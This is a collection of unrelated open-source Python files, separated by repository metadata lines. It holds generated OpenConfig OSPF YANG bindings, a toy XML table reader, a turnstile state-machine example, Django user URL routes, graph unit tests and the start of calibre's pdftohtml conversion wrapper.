If this variable is read-only (config: false) in the
source YANG file, then _set_external_route_tag is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_external_route_tag() directly.
        YANG Description: An opaque tag that is set by the LSA originator to carry
information relating to the external route
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="external-route-tag",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """external_route_tag must be of a type compatible with uint32""",
"defined-type": "uint32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="external-route-tag", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint32', is_config=False)""",
}
)
self.__external_route_tag = t
if hasattr(self, "_set"):
self._set()
def _unset_external_route_tag(self):
self.__external_route_tag = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="external-route-tag",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
mask = __builtin__.property(_get_mask)
metric_type = __builtin__.property(_get_metric_type)
metric = __builtin__.property(_get_metric)
forwarding_address = __builtin__.property(_get_forwarding_address)
external_route_tag = __builtin__.property(_get_external_route_tag)
_pyangbind_elements = OrderedDict(
[
("mask", mask),
("metric_type", metric_type),
("metric", metric),
("forwarding_address", forwarding_address),
("external_route_tag", external_route_tag),
]
)
class state(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa-types/lsa-type/lsas/lsa/as-external-lsa/state. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: State parameters for the AS external LSA
"""
__slots__ = (
"_path_helper",
"_extmethods",
"__mask",
"__metric_type",
"__metric",
"__forwarding_address",
"__external_route_tag",
)
_yang_name = "state"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__mask = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["0..32"]},
),
is_leaf=True,
yang_name="mask",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=False,
)
self.__metric_type = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={"TYPE_1": {}, "TYPE_2": {}},
),
is_leaf=True,
yang_name="metric-type",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="enumeration",
is_config=False,
)
self.__metric = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
is_leaf=True,
yang_name="metric",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-ospf-types:ospf-metric",
is_config=False,
)
self.__forwarding_address = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?"
},
),
restriction_dict={"pattern": "[0-9\\.]*"},
),
is_leaf=True,
yang_name="forwarding-address",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="inet:ipv4-address-no-zone",
is_config=False,
)
self.__external_route_tag = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="external-route-tag",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"ospfv2",
"areas",
"area",
"lsdb",
"lsa-types",
"lsa-type",
"lsas",
"lsa",
"as-external-lsa",
"state",
]
def _get_mask(self):
"""
Getter method for mask, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/mask (uint8)
YANG Description: The subnet mask for the advertised destination
"""
return self.__mask
def _set_mask(self, v, load=False):
"""
Setter method for mask, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/mask (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_mask is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mask() directly.
YANG Description: The subnet mask for the advertised destination
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int,
restriction_dict={"range": ["0..255"]},
int_size=8,
),
restriction_dict={"range": ["0..32"]},
),
is_leaf=True,
yang_name="mask",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """mask must be of a type compatible with uint8""",
"defined-type": "uint8",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), restriction_dict={'range': ['0..32']}), is_leaf=True, yang_name="mask", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint8', is_config=False)""",
}
)
self.__mask = t
if hasattr(self, "_set"):
self._set()
def _unset_mask(self):
self.__mask = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
restriction_dict={"range": ["0..32"]},
),
is_leaf=True,
yang_name="mask",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=False,
)
def _get_metric_type(self):
"""
Getter method for metric_type, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/metric_type (enumeration)
YANG Description: The type of metric included within the AS External LSA.
"""
return self.__metric_type
def _set_metric_type(self, v, load=False):
"""
Setter method for metric_type, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/metric_type (enumeration)
If this variable is read-only (config: false) in the
source YANG file, then _set_metric_type is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_metric_type() directly.
YANG Description: The type of metric included within the AS External LSA.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={"TYPE_1": {}, "TYPE_2": {}},
),
is_leaf=True,
yang_name="metric-type",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="enumeration",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """metric_type must be of a type compatible with enumeration""",
"defined-type": "openconfig-network-instance:enumeration",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=six.text_type, restriction_type="dict_key", restriction_arg={'TYPE_1': {}, 'TYPE_2': {}},), is_leaf=True, yang_name="metric-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='enumeration', is_config=False)""",
}
)
self.__metric_type = t
if hasattr(self, "_set"):
self._set()
def _unset_metric_type(self):
self.__metric_type = YANGDynClass(
base=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={"TYPE_1": {}, "TYPE_2": {}},
),
is_leaf=True,
yang_name="metric-type",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="enumeration",
is_config=False,
)
def _get_metric(self):
"""
Getter method for metric, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/metric (oc-ospf-types:ospf-metric)
YANG Description: The cost to reach the external network specified. The exact
interpretation of this cost is dependent on the type of
metric specified
"""
return self.__metric
def _set_metric(self, v, load=False):
"""
Setter method for metric, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/metric (oc-ospf-types:ospf-metric)
If this variable is read-only (config: false) in the
source YANG file, then _set_metric is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_metric() directly.
YANG Description: The cost to reach the external network specified. The exact
interpretation of this cost is dependent on the type of
metric specified
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
is_leaf=True,
yang_name="metric",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-ospf-types:ospf-metric",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """metric must be of a type compatible with oc-ospf-types:ospf-metric""",
"defined-type": "oc-ospf-types:ospf-metric",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='oc-ospf-types:ospf-metric', is_config=False)""",
}
)
self.__metric = t
if hasattr(self, "_set"):
self._set()
def _unset_metric(self):
self.__metric = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
is_leaf=True,
yang_name="metric",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-ospf-types:ospf-metric",
is_config=False,
)
def _get_forwarding_address(self):
"""
Getter method for forwarding_address, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/forwarding_address (inet:ipv4-address-no-zone)
YANG Description: The destination to which traffic for the external prefix
should be advertised. When this value is set to 0.0.0.0 then
traffic should be forwarded to the LSA's originator
"""
return self.__forwarding_address
def _set_forwarding_address(self, v, load=False):
"""
Setter method for forwarding_address, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/forwarding_address (inet:ipv4-address-no-zone)
If this variable is read-only (config: false) in the
source YANG file, then _set_forwarding_address is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_forwarding_address() directly.
YANG Description: The destination to which traffic for the external prefix
should be advertised. When this value is set to 0.0.0.0 then
traffic should be forwarded to the LSA's originator
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?"
},
),
restriction_dict={"pattern": "[0-9\\.]*"},
),
is_leaf=True,
yang_name="forwarding-address",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="inet:ipv4-address-no-zone",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """forwarding_address must be of a type compatible with inet:ipv4-address-no-zone""",
"defined-type": "inet:ipv4-address-no-zone",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="forwarding-address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)""",
}
)
self.__forwarding_address = t
if hasattr(self, "_set"):
self._set()
def _unset_forwarding_address(self):
self.__forwarding_address = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=six.text_type,
restriction_dict={
"pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?"
},
),
restriction_dict={"pattern": "[0-9\\.]*"},
),
is_leaf=True,
yang_name="forwarding-address",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="inet:ipv4-address-no-zone",
is_config=False,
)
def _get_external_route_tag(self):
"""
Getter method for external_route_tag, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/external_route_tag (uint32)
        YANG Description: An opaque tag that is set by the LSA originator to carry
information relating to the external route
"""
return self.__external_route_tag
def _set_external_route_tag(self, v, load=False):
"""
Setter method for external_route_tag, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state/external_route_tag (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_external_route_tag is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_external_route_tag() directly.
        YANG Description: An opaque tag that is set by the LSA originator to carry
information relating to the external route
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="external-route-tag",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """external_route_tag must be of a type compatible with uint32""",
"defined-type": "uint32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="external-route-tag", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint32', is_config=False)""",
}
)
self.__external_route_tag = t
if hasattr(self, "_set"):
self._set()
def _unset_external_route_tag(self):
self.__external_route_tag = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="external-route-tag",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
mask = __builtin__.property(_get_mask)
metric_type = __builtin__.property(_get_metric_type)
metric = __builtin__.property(_get_metric)
forwarding_address = __builtin__.property(_get_forwarding_address)
external_route_tag = __builtin__.property(_get_external_route_tag)
_pyangbind_elements = OrderedDict(
[
("mask", mask),
("metric_type", metric_type),
("metric", metric),
("forwarding_address", forwarding_address),
("external_route_tag", external_route_tag),
]
)
| apache-2.0 | -8,142,410,994,552,868,000 | 42.85625 | 643 | 0.561575 | false |
sillygod/my-travel-in-learning-python | databaseProject/DataBase.py | 1 | 2520 | '''
FUNC: read an XML file (the database) and transform each table into a list of dictionaries
note: not case sensitive (table names, tags and values are upper-cased internally)
I will make a rule for the database in XML form
ex.
____________________________
Student |name | ID | score | and ID is a key
|aa | 1 | 10 |
|bb | 2 | 20 |
in XML file, I will use something like the following.
<table name='Student'>
<data>
<name>aa</name>
<ID key='key'>1</ID>
<score>10</score>
</data>
<data>
<name>bb</name>
<ID key='key'>2</ID>
<score>20</score>
</data>
</table>
table data type: a dict mapping each table name to a list of row dicts, e.g. {'STUDENT': [{'NAME': 'AA', ...}, ...]}
'''
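# A minimal usage sketch (hedged: 'school.xml' and the variable names below are
# hypothetical, assuming the file holds the <table name='Student'> example above):
#
#   db = DataBase('school.xml')
#   tables = db.getTable()
#   # -> {'STUDENT': [{'NAME': 'AA', 'ID': '1', 'SCORE': '10'},
#   #                 {'NAME': 'BB', 'ID': '2', 'SCORE': '20'}]}
#   print(db.outputTable(tables['STUDENT']))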
try:
import xml.etree.cElementTree as eTree
except ImportError:
import xml.etree.ElementTree as eTree
# The above tries to import the C implementation of the API first, for speed.
# In Python 3.3+ a plain `import xml.etree.ElementTree` automatically picks the fastest available implementation.
class DataBase:
def __init__(self, fileName):
self.Table = {}
self.Tree = eTree.parse(fileName)
self.createTable()
def createTable(self):
''' start to traverse '''
for elem in self.Tree.iter(tag='table'):
tableName=elem.attrib['name'].upper()
self.Table[tableName] = [] # make a table
for data in elem: # enter the each data of table
rowAttribute={} # make a new dict
for attribute in data:
rowAttribute[attribute.tag.upper()]=attribute.text.upper()
self.Table[tableName].append(rowAttribute)
def getTable(self):
''' return a table '''
return self.Table
def findAttribInWhichTable(self, attribName):
result=[]
for key in self.Table:
if attribName in self.Table[key][0]:
result.append(key)
return result
def isTable(self, tableName):
''' check the existence of tableName'''
return tableName in self.Table
def outputTable(self, table):
''' table is a list '''
outputString=''
#dynamic to adjust the alignment?
Alignment = '{:^20}'
isFirstColumn = True
if table == []:
return 'NULL'
order = table[0].keys()
for columnName in order:
if isFirstColumn:
outputString += Alignment.format(columnName)
isFirstColumn = False
else:
outputString += Alignment.format(columnName)
outputString += '\n'
isFirstColumn =True
for data in table:
for attrib in order:
if isFirstColumn:
outputString += Alignment.format(data[attrib])
isFirstColumn = False
else:
outputString += Alignment.format(data[attrib])
isFirstColumn = True
outputString += '\n'
return outputString
| gpl-2.0 | 2,119,482,450,881,611,800 | 23.950495 | 102 | 0.658333 | false |
DarkDruiD/Machinery | Python/Machinery/example.py | 1 | 1470 | import time
import random
from datapath import Datapath
from controller import Delta
from controller import State
from controller import FSMD
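# Example FSM wiring: 'coin' drives locked -> unlocked and 'push' drives
# unlocked -> locked (self-loops otherwise); both inputs come from the random
# stub functions defined below.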
def locked_on_enter():
print "Entered locked state"
time.sleep(3)
def locked_on_leave():
pass
locked = State("locked")
locked.on_enter = locked_on_enter
locked.on_leave = locked_on_leave
def unlocked_on_enter():
print "Entered unlocked state"
time.sleep(3)
def unlocked_on_leave():
pass
unlocked = State("unlocked")
unlocked.on_enter = unlocked_on_enter
unlocked.on_leave = unlocked_on_leave
datapath = Datapath()
def read_coin_function():
return random.randint(0, 1)
datapath.add_variable("coin", read_coin_function)
def read_push_function():
return random.randint(0, 1)
datapath.add_variable("push", read_push_function)
state_table = Delta()
def when_pushed(dp):
if dp.get_variable("push"):
return True
return False
state_table.add_transition(
locked,
locked,
when_pushed,
None
)
def when_coined(dp):
if dp.get_variable("coin"):
return True
return False
state_table.add_transition(
locked,
unlocked,
when_coined,
None
)
state_table.add_transition(
unlocked,
unlocked,
when_coined,
None
)
state_table.add_transition(
unlocked,
locked,
when_pushed,
None
)
states = (
locked,
unlocked
)
fmsd = FSMD(states, datapath, state_table, locked)
fmsd.run()
| mit | -3,953,514,065,446,916,000 | 12.125 | 50 | 0.669388 | false |
anushbmx/kitsune | kitsune/users/urls.py | 1 | 4192 | from django.conf import settings
from django.conf.urls import include, url
from django.views.decorators.cache import never_cache
from mozilla_django_oidc.views import OIDCAuthenticationCallbackView
import kitsune.flagit.views
from kitsune.sumo.views import redirect_to
from kitsune.users import api, views
from kitsune.users.models import Profile
# API patterns. All start with /users/api.
api_patterns = [
url(r'^usernames', api.usernames, name='users.api.usernames'),
]
# These will all start with /user/<user_id>/
detail_patterns = [
url(r'^$', views.profile, name='users.profile'),
url(r'^/documents$', views.documents_contributed, name='users.documents'),
url(r'^/edit$', views.edit_profile, name='users.edit_profile'),
# TODO:
# url('^abuse', views.report_abuse, name='users.abuse'),
]
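# For example (illustrative only): once included under /user/<username> at the
# bottom of this module, /user/jsmith resolves to users.profile and
# /user/jsmith/edit to users.edit_profile.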
users_patterns = [
url(r'^/auth$', views.user_auth, name='users.auth'),
url(r'^/login$', views.login, name='users.login'),
url(r'^/logout$', views.logout, name='users.logout'),
url(r'^/close_account$', views.close_account, name='users.close_account'),
url(r'^/activate/(?P<activation_key>\w+)$', views.activate,
name='users.old_activate'),
url(r'^/activate/(?P<user_id>\d+)/(?P<activation_key>\w+)$',
views.activate, name='users.activate'),
url(r'^/edit$', views.edit_profile, name='users.edit_my_profile'),
url(r'^/settings$', views.edit_settings, name='users.edit_settings'),
url(r'^/watches$', views.edit_watch_list, name='users.edit_watch_list'),
url(r'^/avatar$', views.edit_avatar, name='users.edit_avatar'),
url(r'^/avatar/delete$', views.delete_avatar, name='users.delete_avatar'),
url(r'^/deactivate$', views.deactivate, name='users.deactivate'),
url(r'^/deactivate-spam$', views.deactivate, {'mark_spam': True},
name='users.deactivate-spam'),
url(r'^/deactivation_log$', views.deactivation_log,
name='users.deactivation_log'),
url(r'^/make_contributor$', views.make_contributor,
name='users.make_contributor'),
# Password reset
url(r'^/pwreset$', views.password_reset, name='users.pw_reset'),
url(r'^/pwresetsent$', views.password_reset_sent,
name='users.pw_reset_sent'),
url(r'^/pwreset/(?P<uidb36>[-\w]+)/(?P<token>[-\w]+)$',
views.password_reset_confirm, name="users.pw_reset_confirm"),
url(r'^/pwresetcomplete$', views.password_reset_complete,
name="users.pw_reset_complete"),
# Forgot username
url(r'^/forgot-username$', views.forgot_username,
name='users.forgot_username'),
# Change password
url(r'^/pwchange$', views.password_change, name='users.pw_change'),
url(r'^/pwchangecomplete$', views.password_change_complete,
name='users.pw_change_complete'),
url(r'^/resendconfirmation$', views.resend_confirmation,
name='users.resend_confirmation'),
# Change email
url(r'^change_email$', redirect_to, {'url': 'users.change_email'},
name='users.old_change_email'),
url(r'^confirm_email/(?P<activation_key>\w+)$',
redirect_to, {'url': 'users.confirm_email'},
name='users.old_confirm_email'),
url(r'^/change_email$', views.change_email, name='users.change_email'),
url(r'^/confirm_email/(?P<activation_key>\w+)$',
views.confirm_change_email, name='users.confirm_email'),
url(r'^/api/', include(api_patterns)),
]
urlpatterns = [
# URLs for a single user.
url(r'^user/(?P<username>[\w@\.\s+-]+)', include(detail_patterns)),
url(r'^user/(?P<object_id>\w+)/flag$', kitsune.flagit.views.flag,
{'model': Profile}, name='users.flag'),
url(r'^users', include(users_patterns)),
]
if settings.OIDC_ENABLE:
urlpatterns += [
url(r'^fxa/callback/$', never_cache(OIDCAuthenticationCallbackView.as_view()),
name='users.fxa_authentication_callback'),
url(r'^fxa/authenticate/$', never_cache(views.FXAAuthenticateView.as_view()),
name='users.fxa_authentication_init'),
url(r'^fxa/logout/$', never_cache(views.FXALogoutView.as_view()),
name='users.fxa_logout_url'),
url(r'^oidc/', include('mozilla_django_oidc.urls')),
]
| bsd-3-clause | 7,517,170,160,506,751,000 | 40.098039 | 86 | 0.649332 | false |
bniemczyk/symbolic | tests/graph.py | 1 | 1719 | import symath
from symath.graph.algorithms import *
import symath.graph.generation as graphgen
import unittest
class TestDirectedGraph(unittest.TestCase):
def setUp(self):
self.x, self.y, self.z, self.w, self.e1, self.e2 = symath.symbols('x y z w e1 e2')
self.g = symath.graph.directed.DirectedGraph()
self.g.connect(self.x, self.y, self.e1)
self.g.connect(self.y, self.z, self.e2)
self.g.connect(self.x, self.y, self.e2)
self.g.connect(self.z, self.w)
self.g.connect(self.x, self.w)
def test_edges(self):
self.assertEqual(len(self.g.nodes[self.x].outgoing), 2)
def test_union(self):
og = symath.graph.directed.DirectedGraph()
og.connect(self.x, symath.symbols('ognode'))
og.union(self.g)
self.assertTrue(og.connectedQ(self.x, self.y))
def test_pathq(self):
self.assertTrue(pathQ(self.g, self.x, self.z))
def test_adj_matrix(self):
mp,m = self.g.adjacency_matrix()
self.assertEqual(m.shape[0], 4)
self.assertEqual(m[mp[self.x],mp[self.y]], 1)
self.assertEqual(m[mp[self.x],mp[self.x]], 0)
def test_random_generation(self):
randg = graphgen.random_graph(100, 0.05)
def test_edgevalue_disconnect(self):
g = symath.graph.directed.DirectedGraph()
g.connect(self.x, self.y, self.e1)
g.connect(self.x, self.y, self.e2)
g.disconnect(self.x, self.y)
self.assertFalse(g.connectedQ(self.x, self.y))
g.connect(self.x, self.y, self.e1)
g.connect(self.x, self.y, self.e2)
g.disconnect(self.x, self.y, self.e1)
self.assertTrue(g.connectedQ(self.x, self.y))
g.disconnect(self.x, self.y, self.e2)
self.assertFalse(g.connectedQ(self.x, self.y))
| bsd-2-clause | 6,984,097,929,951,748,000 | 31.705882 | 86 | 0.655614 | false |
jelly/calibre | src/calibre/ebooks/pdf/pdftohtml.py | 1 | 6990 | # -*- coding: utf-8 -*-
__license__ = 'GPL 3'
__copyright__ = '2008, Kovid Goyal <kovid at kovidgoyal.net>, ' \
'2009, John Schember <[email protected]>'
__docformat__ = 'restructuredtext en'
import errno, os, sys, subprocess, shutil, re
from functools import partial
from calibre.ebooks import ConversionError, DRMError
from calibre.ebooks.chardet import xml_to_unicode
from calibre.ptempfile import PersistentTemporaryFile
from calibre.constants import (isosx, iswindows, islinux, isbsd,
filesystem_encoding)
from calibre import CurrentDir
from calibre.utils.cleantext import clean_xml_chars
PDFTOHTML = 'pdftohtml'
popen = subprocess.Popen
if isosx and hasattr(sys, 'frameworks_dir'):
PDFTOHTML = os.path.join(getattr(sys, 'frameworks_dir'), PDFTOHTML)
if iswindows and hasattr(sys, 'frozen'):
base = sys.extensions_location if hasattr(sys, 'new_app_layout') else os.path.dirname(sys.executable)
PDFTOHTML = os.path.join(base, 'pdftohtml.exe')
popen = partial(subprocess.Popen, creationflags=0x08) # CREATE_NO_WINDOW=0x08 so that no ugly console is popped up
if (islinux or isbsd) and getattr(sys, 'frozen', False):
PDFTOHTML = os.path.join(sys.executables_location, 'bin', 'pdftohtml')
def pdftohtml(output_dir, pdf_path, no_images, as_xml=False):
'''
Convert the pdf into html using the pdftohtml app.
This will write the html as index.html into output_dir.
It will also write all extracted images to the output_dir
'''
pdfsrc = os.path.join(output_dir, u'src.pdf')
index = os.path.join(output_dir, u'index.'+('xml' if as_xml else 'html'))
with open(pdf_path, 'rb') as src, open(pdfsrc, 'wb') as dest:
shutil.copyfileobj(src, dest)
with CurrentDir(output_dir):
# This is necessary as pdftohtml doesn't always (linux) respect
# absolute paths. Also, it allows us to safely pass only bytestring
        # arguments to subprocess on windows.
# subprocess in python 2 cannot handle unicode arguments on windows
# that cannot be encoded with mbcs. Ensure all args are
# bytestrings.
def a(x):
return os.path.basename(x).encode('ascii')
exe = PDFTOHTML.encode(filesystem_encoding) if isinstance(PDFTOHTML,
unicode) else PDFTOHTML
cmd = [exe, b'-enc', b'UTF-8', b'-noframes', b'-p', b'-nomerge',
b'-nodrm', a(pdfsrc), a(index)]
if isbsd:
cmd.remove(b'-nodrm')
if no_images:
cmd.append(b'-i')
if as_xml:
cmd.append('-xml')
logf = PersistentTemporaryFile(u'pdftohtml_log')
try:
p = popen(cmd, stderr=logf._fd, stdout=logf._fd,
stdin=subprocess.PIPE)
except OSError as err:
